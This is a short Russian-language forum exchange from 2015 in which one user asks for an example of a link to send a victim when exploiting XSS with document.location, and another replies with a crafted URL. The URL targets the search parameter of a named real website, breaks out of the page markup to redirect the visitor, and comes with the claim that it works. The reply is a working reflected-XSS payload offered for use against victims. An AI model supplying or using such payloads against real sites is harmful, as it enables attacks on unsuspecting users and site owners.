24.11.2015, 11:47
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
Сообщение от Hussar
↑
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
Если я правильно понял
Код:
http://www.alfa.com.tw/search.php?keyword=">document.location.href='http://google.com'
Проверял только в тор-браузере. Работает.
|
|
|